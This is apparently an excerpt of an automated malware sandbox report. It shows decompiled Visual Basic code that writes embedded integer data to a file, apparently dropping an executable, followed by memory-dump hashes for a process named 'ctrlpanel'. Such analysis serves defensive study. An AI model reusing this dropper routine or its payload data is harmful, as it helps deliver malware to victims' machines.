                            Y = - 778711008

                            7126

                            Y = - 792997759

                            7127

                            Y = - 1076879176

                            7128

                            Y = - 1194295087

                            7129

                            Y = - 1093616688

                            7130

                            Y = - 1244612912

                            7131

                            Y = - 1194279472

                            7132

                            Y = - 803162672

                            7133

                            Y = - 796864065

                            7134

                            Y = - 793456459

                            7135

                            Y = - 793718595

                            7136

                            Y = - 792866633

                            7137

                            Y = - 796405328

                            7138

                            Y = - 792866635

                            7139

                            Y = - 1261428546

                            7140

                            Y = - 1882080304

                            7141

                            Y = - 796864224

                            7142

                            Y = - 793653072

                            7143

                            Y = - 779955778

                            7144

                            Y = - 2117001077

                            7145

                            Y = 1852397344

                            7146

                            Y = 1937207140

                            7147

                            Y = 539768864

                            7148

                            Y = - 1110408751

                            7149

                            Y = - 1127171888

                            7150

                            Y = - 2100184880

                            7151

                            Y = - 803162672

                            7152

                            Y = - 792801094

                            7153

                            Y = - 792932164

                            7154

                            Y = - 776089419

                            7155

                            Y = - 776941438

                            7156

                            Y = - 793194368

                            7157

                            Y = - 2117001031

                            7158

                            Y = - 786383152

                            7159

                            Y = - 792997759

                            7160

                            Y = - 776679243

                            7161

                            Y = - 779169405

                            7162

                            Y = - 793390967

                            7163

                            Y = 549376179

                            7164

                            Y = - 1211071535

                            7165

                            Y = - 1328497712

                            7166

                            Y = 1886745376

                            7167

                            Y = 1953656688

                            7168

                            Y = 1397711973

                            7169

                            Y = 222178605

                            7170

                            Y = 538976266

                            7171

                            Y = 1008738336

                            7172

                            Y = 1009593633

                            7173

                            Y = 1886418291

                            7174

                            Y = 1702130287

                            7175

                            Y = 542330724

                            7176

                            Y = 574448713

                            7177

                            Y = 845231227

                            7178

                            Y = 1698181734

                            7179

                            Y = 859122995

                            7180

                            Y = 875379042

                            7181

                            Y = 758199348

                            7182

                            Y = 1664704866

                            7183

                            Y = 959865901

                            7184

                            Y = 878785636

                            7185

                            Y = 862271073

                            7186

                            Y = 1042447672

                            7187

                            Y = 1970483004

                            7188

                            Y = 1919905904

                            7189

                            Y = 1331979636

                            7190

                            Y = 757939795

                            7191

                            Y = 218762558

                            7192

                            Y = 538976266

                            7193

                            Y = 1630485536

                            7194

                            Y = 1768714352

                            7195

                            Y = 1769234787

                            7196

                            Y = 222195311

                            7197

                            Y = 1008738314

                            7198

                            Y = 1836016431

                            7199

                            Y = 1769234800

                            7200

                            Y = 1768712546

                            7201

                            Y = 222198132

                            7202

                            Y = 537529610

                            7203

                            Y = 757152800

                            7204

                            Y = - 1831854035

                            7205

                            Y = - 1143948592

                            7206

                            Y = - 2016309551

                            7207

                            Y = - 2100184880

                            7208

                            Y = - 786385456

                            7209

                            Y = - 793390974

                            7210

                            Y = 546034108

                            7211

                            Y = - 1143950128

                            7212

                            Y = - 803172399

                            7213

                            Y = - 793718595

                            7214

                            Y = - 793653064

                            7215

                            Y = - 792997698

                            7216

                            Y = 548786357

                            7217

                            Y = - 1311719728

                            7218

                            Y = - 1194292783

                            7219

                            Y = - 786397743

                            7220

                            Y = - 792997747

                            7221

                            Y = - 792932171

                            7222

                            Y = - 776089419

                            7223

                            Y = - 792801150

                            7224

                            Y = - 2083446606

                            7225

                            Y = - 2133737520

                            7226

                            Y = - 1294946096

                            7227

                            Y = - 1244611632

                            7228

                            Y = - 1194279472

                            7229

                            Y = - 803172399

                            7230

                            Y = - 1261428552

                            7231

                            Y = - 1328498480

                            7232

                            Y = - 1093616688

                            7233

                            Y = - 1093618736

                            7234

                            Y = - 1949191472

                            7235

                            Y = - 803174959

                            7236

                            Y = - 793063234

                            7237

                            Y = 549310654

                            7238

                            Y = 1684957527

                            7239

                            Y = 544438127

                            7240

                            Y = 1852397352

                            7241

                            Y = 1937207140

                            7242

                            Y = 542136352

                            7243

                            Y = - 803161904

                            7244

                            Y = - 776023873

                            7245

                            Y = - 792997759

                            7246

                            Y = - 776679243

                            7247

                            Y = - 779169405

                            7248

                            Y = - 793194359

                            7249

                            Y = - 1294982987

                            7250

                            Y = - 2133740080

                            7251

                            Y = - 1194294831

                            7252

                            Y = 539605200

                            7253

                            Y = 222178605

                            7254

                            Y = 1008738314

                            7255

                            Y = 539831585

                            7256

                            Y = 1885692988

                            7257

                            Y = 1701080677

                            7258

                            Y = 1048142702

                            7259

                            Y = 538970637

                            7260

                            Y = 1681661984

                            7261

                            Y = 1852141669

                            7262

                            Y = 1953391972

                            7263

                            Y = 1702064961

                            7264

                            Y = 2037146221

                            7265

                            Y = 537529662

                            7266

                            Y = 538976288

                            7267

                            Y = 1935752224

                            7268

                            Y = 1651336563

                            7269

                            Y = 1682536812

                            7270

                            Y = 1769238117

                            7271

                            Y = 168655220

                            7272

                            For I = 1 To 2

                            7273

                            Y = 538976288

                            7274

                            Next

                            7275

                            Y = 2037653536

                            7276

                            Y = 574449008

                            7277

                            Y = 862873975

                            7278

                            Y = 168632882

                            7279

                            For I = 1 To 2

                            7280

                            Y = 538976288

                            7281

                            Next

                            7282

                            Y = 1634607136

                            7283

                            Y = 574449005

                            7284

                            Y = 1919117645

                            7285

                            Y = 1718580079

                            7286

                            Y = 1767321204

                            7287

                            Y = 2003788910

                            7288

                            Y = 1866673779

                            7289

                            Y = 1852796269

                            7290

                            Y = 1852785453

                            7291

                            Y = 1819243124

                            7292

                            Y = 168632947

                            7293

                            For I = 1 To 2

                            7294

                            Y = 538976288

                            7295

                            Next

                            7296

                            Y = 1702240288

                            7297

                            Y = 1869181810

                            7298

                            Y = 908213614

                            7299

                            Y = 808333358

                            7300

                            Y = 220344366

                            7301

                            Y = 538976266

                            7302

                            Y = 538976288

                            7303

                            Y = 1881153568

                            7304

                            Y = 1701015410

                            7305

                            Y = 1919906675

                            7306

                            Y = 1751347777

                            7307

                            Y = 1667593321

                            7308

                            Y = 1701999988

                            7309

                            Y = 573186621

                            7310

                            Y = 538970637

                            7311

                            For I = 1 To 2

                            7312

                            Y = 538976288

                            7313

                            Next

                            7314

                            Y = 1818391920

                            7315

                            Y = 1699439465

                            7316

                            Y = 1802458233

                            7317

                            Y = 574451301

                            7318

                            Y = 892941622

                            7319

                            Y = 825505378

                            7320

                            Y = 1667445812

                            7321

                            Y = 1717842278

                            7322

                            Y = 537529634

                            7323

                            For I = 1 To 2

                            7324

                            Y = 538976288

                            7325

                            Next

                            7326

                            Y = 1851878432

                            7327

                            Y = 1734440295

                            7328

                            Y = 706887013

                            7329

                            Y = 537529634

                            7330

                            Y = 538976288

                            7331

                            Y = 790634528

                            7332

                            Y = 537529662

                            7333

                            Y = 1008738336

                            7334

                            Y = 1885692975

                            7335

                            Y = 1701080677

                            7336

                            Y = 1933669486

                            7337

                            Y = 1651336563

                            7338

                            Y = 222198124

                            7339

                            Y = 1008738314

                            7340

                            Y = 1885692975

                            7341

                            Y = 1701080677

                            7342

                            Y = 1048142702

                            7343

                            Y = 222178605

                            7344

                            Y = 1007291658

                            7345

                            Y = 1836278063

                            7346

                            Y = 1631203702

                            7347

                            Y = 1835365235

                            7348

                            Y = 1048144994

                            7349

                            Y = 2573

                            7350

                            For I = 1 To 84

                            7351

                            Y = 0

                            7352

                            Next

                            7353

                            Y = 20480

                            7354

                            Y = 12

                            7355

                            Y = 12928

                            7356

                            For I = 1 To 125

                            7357

                            Y = 0

                            7358

                            Next

                            7359

                            End Sub

                            LineInstructionMeta Information
                            12

                            Private Property Let Y(Value as Long)

                            13

                            Put # 1, , Value

                            executed
                            14

                            End Property

                            Reset < >
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 869521a354c17780b4b9039a3fb3d8fef668806451bcbae2ca27e0a4b3cd3ddb
                              • Instruction ID: 903fe1f75dcc4f983b2744b699503224f370e6c6feb3f673a47d38998d905149
                              • Opcode Fuzzy Hash: 869521a354c17780b4b9039a3fb3d8fef668806451bcbae2ca27e0a4b3cd3ddb
                              • Instruction Fuzzy Hash: 3972B170A18A8D8FEBB5EF288859BE977E0FF58305F10017AD84DC7296DF34A9418742
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5c9129dd2eef600f840ba958ccc913e87aa0a3c83f07afde06d24f0f6f9ef66a
                              • Instruction ID: 721ffc9ee313897ac3e660a26ca93e5911ec37a0f830feef0850a4bb15d7aaed
                              • Opcode Fuzzy Hash: 5c9129dd2eef600f840ba958ccc913e87aa0a3c83f07afde06d24f0f6f9ef66a
                              • Instruction Fuzzy Hash: 5B120921B0DB494FDB8AEB2C5464B787BE1EF5A300B1501FAD84ECB2D7DD28AC458752
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e75a92a1483fb2d96a2be246bf048df69d9a2b100b4eec5d9807bf0b5331cece
                              • Instruction ID: abf74ce501099a625deee0d696031f4d68444a112e36eb5ee980d6352cb7cc7b
                              • Opcode Fuzzy Hash: e75a92a1483fb2d96a2be246bf048df69d9a2b100b4eec5d9807bf0b5331cece
                              • Instruction Fuzzy Hash: DEE14F70A1898D8EEBB5EF18CC95FE977A0FF19304F900666D80ECB196DE74A644CB41
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c8f5c7f5684aa9a2be3e4f2fb63165c4efd9cf4cdbbf71bfc07536f020b7ad10
                              • Instruction ID: cc1fee4a28038cd1c024dee662386d212a85d9ae56d3a3618a6849211aba2c1d
                              • Opcode Fuzzy Hash: c8f5c7f5684aa9a2be3e4f2fb63165c4efd9cf4cdbbf71bfc07536f020b7ad10
                              • Instruction Fuzzy Hash: 76C16D61B1CA490FEB18EF288865BB977D1EF59354F14027EE45EC71D7DD28A8828343
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c1b6bba29dae7046bd8dacac96e3391d07e7eda7ad34e3760dd061e55de6085d
                              • Instruction ID: ba030133073a912a3414118b12461312b8929cbfac65d7605246d45aba804270
                              • Opcode Fuzzy Hash: c1b6bba29dae7046bd8dacac96e3391d07e7eda7ad34e3760dd061e55de6085d
                              • Instruction Fuzzy Hash: B791FFB1608A8C8FEFA1EF68D8987D977E0FB69345F14416BD84DCB251DB30A544CB42
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61b7d421fced3edc06ddac62908d2f3cac87fc078d3bf9e255a9528811c326c7
                              • Instruction ID: 8de26a75956e8f409f87141a5ae9ec09510fd6c15d5faa166aef1ece59eca327
                              • Opcode Fuzzy Hash: 61b7d421fced3edc06ddac62908d2f3cac87fc078d3bf9e255a9528811c326c7
                              • Instruction Fuzzy Hash: 33510392B1DB880FE35A9F2858716697FE1EF9A204B5902FBE09DCB2DBDD145C054313
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 81e04eae72cb0bc39a1d190fa2fd9daf1f7a0aef5aa7e53b5af251dedc8fc6e6
                              • Instruction ID: b5c98088b74269894a949985222dcd39c68be343824b0db88d59acf5e05c2558
                              • Opcode Fuzzy Hash: 81e04eae72cb0bc39a1d190fa2fd9daf1f7a0aef5aa7e53b5af251dedc8fc6e6
                              • Instruction Fuzzy Hash: D051EE83A0F7C65FE7A34E794C751A06FB19E6319470E51EBD1D9CA1E7E8082C098323
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 469881f46cb5344c73a5c45d7c75261c2a2b5c7e6fd6a0f47e65d22a5d027bd7
                              • Instruction ID: ad745efa5a48535311bdb14cdc78daad4424cf65f845bfd4795cc446bba75a4f
                              • Opcode Fuzzy Hash: 469881f46cb5344c73a5c45d7c75261c2a2b5c7e6fd6a0f47e65d22a5d027bd7
                              • Instruction Fuzzy Hash: 9751E5A160E7885FDB56DF2898657697FE0EF06304F0900EFE089CB1D7DA285D058792
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 85df9b95d97db7ea76ef226f6c985f37e4d17e2d9f7602448c9702e94224e2d2
                              • Instruction ID: cec5657dfdeac856db677df61deb655f6b6ec3a4b5f0910f64a7fa11764a44e8
                              • Opcode Fuzzy Hash: 85df9b95d97db7ea76ef226f6c985f37e4d17e2d9f7602448c9702e94224e2d2
                              • Instruction Fuzzy Hash: BA5139D2A0F6C81FE756AFB884691647F90EF17201B1800FBD48DCA1A3E9559C498393
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 194d054cd5fd1971f612c33b1aa81d283fbe56575c70a4ffb6d02b07be6cdc58
                              • Instruction ID: 879e9d616a3e513a135ba25e4a4db23d2df41829d1ec12da89c282fad9b48968
                              • Opcode Fuzzy Hash: 194d054cd5fd1971f612c33b1aa81d283fbe56575c70a4ffb6d02b07be6cdc58
                              • Instruction Fuzzy Hash: F3518D71B189494FEB69EF389865AF973D2FF94354F10027AE52EC71E3DE2468028742
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 812120a4421bf34d3efe121129311ae8a799d2dc92a35a3619e4c8345e6ea03e
                              • Instruction ID: b0c18c7c43d3ca6ca2d8ab3d295b6e151e37af518d6b7302f9e0b9419cbe588c
                              • Opcode Fuzzy Hash: 812120a4421bf34d3efe121129311ae8a799d2dc92a35a3619e4c8345e6ea03e
                              • Instruction Fuzzy Hash: 8E410972B09A4D8FDFA5EFA884746687BE0FF19315B0905AAE15EC7193DE24AC00C742
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5a0c4acd4d9f275d909d5f26bb302e04e2577902e66c1f43f1da21e12878565b
                              • Instruction ID: 5c6a3501dd841efd6ac27f925248b76d3881f4fa5f95882d14d82cd742045e70
                              • Opcode Fuzzy Hash: 5a0c4acd4d9f275d909d5f26bb302e04e2577902e66c1f43f1da21e12878565b
                              • Instruction Fuzzy Hash: 41213351B1CB8A4FD3519F7888A16A976D1EF97328F4842BAE08DCB2D7DD2CD8484342
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b3f389ad626892d41f8e046285d71cf3bf3c3c4ce2825ed49b36a762c332e22c
                              • Instruction ID: 51dd3bf649ea474303858c307065a489bf0b0d61e2eb8a27e8d32022d5d737e8
                              • Opcode Fuzzy Hash: b3f389ad626892d41f8e046285d71cf3bf3c3c4ce2825ed49b36a762c332e22c
                              • Instruction Fuzzy Hash: 3921F670B2894E8FEF90EF68D865BE976E1EF68305F404175A90DC7296DF38E9808741
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b3f389ad626892d41f8e046285d71cf3bf3c3c4ce2825ed49b36a762c332e22c
                              • Instruction ID: a7bb92d22f494e0b2ba4aa033fa49ebd813fbf9571221a7c4d14ef9060e41f39
                              • Opcode Fuzzy Hash: b3f389ad626892d41f8e046285d71cf3bf3c3c4ce2825ed49b36a762c332e22c
                              • Instruction Fuzzy Hash: F8212670B1894D8FEF90EF28C864BE976E1EF68305F400575A40DC7292CF38E8819741
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c8ee56220fcacc71412b06e1c79f184c5621be167f86a477c69d583fb791de24
                              • Instruction ID: 3815cc94e61c4d6cbdf380d86c7d5c37d26bc093ebdbbc30d74475007f42b48a
                              • Opcode Fuzzy Hash: c8ee56220fcacc71412b06e1c79f184c5621be167f86a477c69d583fb791de24
                              • Instruction Fuzzy Hash: 06218761B1898D4FEBA4DF58C8A5BF8B3E1FF08348F400576D50EC71C6CE69A8448741
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: feccc08f8cd2282872ff5ee8e6052617138d9e3ff8fc79c71738062c48e41bdd
                              • Instruction ID: 392e8981c2cc1c6c5cdd8373c5338a001616ddbf5b7256209b01784fdcd13582
                              • Opcode Fuzzy Hash: feccc08f8cd2282872ff5ee8e6052617138d9e3ff8fc79c71738062c48e41bdd
                              • Instruction Fuzzy Hash: 9921ACB171D6498FEF64CF6898A4BE87790FF65348F1002BAD60ECB192DA256905C702
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 076b40ae8c5c00c31eb52d3dfc51efd885922d9ad768db5595152da90c2be0b5
                              • Instruction ID: 3805587506d99ae2ea4cf0fabf1b7051b9d8c198f66c3a9d55a62f93eafc59a1
                              • Opcode Fuzzy Hash: 076b40ae8c5c00c31eb52d3dfc51efd885922d9ad768db5595152da90c2be0b5
                              • Instruction Fuzzy Hash: 3211C66051CACC5FD785DF2C8859BE93FD1EF5A300F4841AAA44DD7192CE6885488781
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 201b504fe3ea125c95e46a760f513968298f979226f00f09fbde7f3597486669
                              • Instruction ID: de8912c3890ce5c4c6d655c8b42d361f285cbb8ec99f0bd15dcca8f52b894f65
                              • Opcode Fuzzy Hash: 201b504fe3ea125c95e46a760f513968298f979226f00f09fbde7f3597486669
                              • Instruction Fuzzy Hash: E4116A60B18A8D4EEFB4EF689865BE973E1FF58309F804176D41EC6196CE38A9458302
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b96b9f622cb429076d29cb09015bb486e2197788fabca018a8f69c055f8b24ce
                              • Instruction ID: 738f7eaf4050b4b81f856359335645af78eb919e9824a51d2afbbce91adbe538
                              • Opcode Fuzzy Hash: b96b9f622cb429076d29cb09015bb486e2197788fabca018a8f69c055f8b24ce
                              • Instruction Fuzzy Hash: 5D118F60B19A4D4FEBA0EF688865BF8B3E1FF48304F400176D41DC7196CF78A9058742
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07908d5f1ca114490b01bc21e5c097a3074a104c9e0ba91f192a3dd3888b2f88
                              • Instruction ID: 428dbcbee1d4cc4b1af4e7726c8cb3074dd08a16a52fca2b40c849feada44002
                              • Opcode Fuzzy Hash: 07908d5f1ca114490b01bc21e5c097a3074a104c9e0ba91f192a3dd3888b2f88
                              • Instruction Fuzzy Hash: D9118E62B18A8D4FEBA0DF688861BE977E1FF49348F5401B9D41DC71C6CE38A944C702
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b6c7d7d92f6350937ac8492334a8e9ebf1630d608006cf51953cc428bda01f0
                              • Instruction ID: dab96f64b29c5604def3fbd316fc9c6acddef40e3aecf01302879196c54cdaf3
                              • Opcode Fuzzy Hash: 2b6c7d7d92f6350937ac8492334a8e9ebf1630d608006cf51953cc428bda01f0
                              • Instruction Fuzzy Hash: 72115E61B18A8D4FEBA4DF688861BEC77E1FF48308F4801B9D41DC71D6CE38A9459702
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 50473d332c8be0be1f34a878cd2b92b7190c37247410d7be2557c901eac8e965
                              • Instruction ID: cff68fbe62bbd874d08460c70f0de139754fcb1c54713985505de9efd5dcac99
                              • Opcode Fuzzy Hash: 50473d332c8be0be1f34a878cd2b92b7190c37247410d7be2557c901eac8e965
                              • Instruction Fuzzy Hash: 66115B61B18A4D8FEBA0DF68C865BE872E1FF48308F540575D81ECB1D6CF38A9558702
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1437aee412ea3497b1b7c30bdc55c61f50356ed0f7b22689e0ff2b6530a7302a
                              • Instruction ID: 58308431e5bf934e655deb2194fff33671803de62fd2dd18d860a598a59167bc
                              • Opcode Fuzzy Hash: 1437aee412ea3497b1b7c30bdc55c61f50356ed0f7b22689e0ff2b6530a7302a
                              • Instruction Fuzzy Hash: 80116D20B18A4D4EEFA4EF6888657F8B3E1FF58304F400176D41DC6196CE38A9459302
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 48459a9b6cbea92ffca8461266ef0d1c01ac95b15becc647c8fdb29ed3823ba0
                              • Instruction ID: a4cbe91dbd71a0d0370fc4dbb7f768f04d702aa1acf34989b4efe00f35a6e97f
                              • Opcode Fuzzy Hash: 48459a9b6cbea92ffca8461266ef0d1c01ac95b15becc647c8fdb29ed3823ba0
                              • Instruction Fuzzy Hash: 8B11C8716087898FDB429F7488A47A97BE1FF06304F4901FAE04ACF0D3DB289804C751
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9a48ce4b9ac7bb905ef7306c8704c4798ca8a21372a5c4817382263046f88a34
                              • Instruction ID: 3e4e060aa68b4132bd0c9f752c8d45df6dd9f32f3d14109f3049cd41a238a784
                              • Opcode Fuzzy Hash: 9a48ce4b9ac7bb905ef7306c8704c4798ca8a21372a5c4817382263046f88a34
                              • Instruction Fuzzy Hash: 27118E6260D7C55FD3438F7898616953FA2EF47318F0902EAE489CF0E3DA195945C763
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b19b9f3b8ab774545c986928e7b710c7e072fb977c76d4a28b075cb3cbda3089
                              • Instruction ID: 1f381f22f393a96830c39295ec0e21a8eaec57502007f9118c982587586ae968
                              • Opcode Fuzzy Hash: b19b9f3b8ab774545c986928e7b710c7e072fb977c76d4a28b075cb3cbda3089
                              • Instruction Fuzzy Hash: 0BF0C863B0990A5FDBC9FF6D88A5974B395EF94305744017AD01EC71D7CF18AC858342
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 176cdccf79d803866e0fb1838b3dc3f3c03f55fa2954af6cb7cd913a16a3888c
                              • Instruction ID: a321e9eef0be99102fb226ce5d6457dbdf392dfb144633f81c6de8cb45a2f5f7
                              • Opcode Fuzzy Hash: 176cdccf79d803866e0fb1838b3dc3f3c03f55fa2954af6cb7cd913a16a3888c
                              • Instruction Fuzzy Hash: 9701B1A3A0E7C45FE7479F3458612553FA0AF43308F1A02D7E088CF0E3DA195A158393
                              Memory Dump Source
